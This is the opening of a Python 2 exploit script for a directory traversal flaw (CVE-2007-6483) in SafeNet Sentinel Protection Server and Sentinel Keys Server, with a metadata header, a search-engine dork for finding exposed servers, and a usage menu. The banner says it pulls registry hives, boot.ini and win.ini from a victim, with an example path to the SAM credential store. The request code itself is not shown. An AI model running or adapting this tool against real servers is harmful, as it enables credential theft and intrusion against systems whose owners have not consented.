SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 - Directory Traversal
#!/usr/bin/python
#
# Exploit Title: SafeNet Sentinel Protection Server 7.0 - 7.4 and Sentinel Keys Server 1.0.3 - 1.0.4 Directory Traversal
# Date: 04/28/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: http://www.safenet-inc.com/
# Software Link: http://c3.safenet-inc.com/downloads/2/1/21DAC8BE-72DE-4D32-85D4-6A1FC600581E/Sentinel%20Protection%20Installer%207.4.0.exe
# Version: SafeNet Sentinel Protection Server 7.0.0 through 7.4.0 and Sentinel Keys Server 1.0.3
# Tested on: Windows 7 and Windows XP SP2
# CVE: CVE-2007-6483
# Dork: intitle:"Sentinel Keys License Monitor"
# Greets to norsec0de
import sys, urllib2, argparse
print '\n[+] SafeNet Sentinel Protection Server 7.0 - 7.4 Directory Traversal Exploit'
print '[+] Written by Matt Schmidt (Syph0n)'
print '[+] This script will download the registry hives, boot.ini and win.ini off the Target Windows box'
print '[+] For Windows versions other than Windows XP you will have to append the --file option and specifiy a file\n'
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
print 'Usage:'
print './exploit.py --host <target> [options]'
print ' <host>: The victim host\n'
print ' Options:'
print ' --port The port the application is listening on (default: 7002)'
print ' --file Path to the desired remote file (ex. windows/repair/sam) without starting slash\n\n'
sys.exit(1)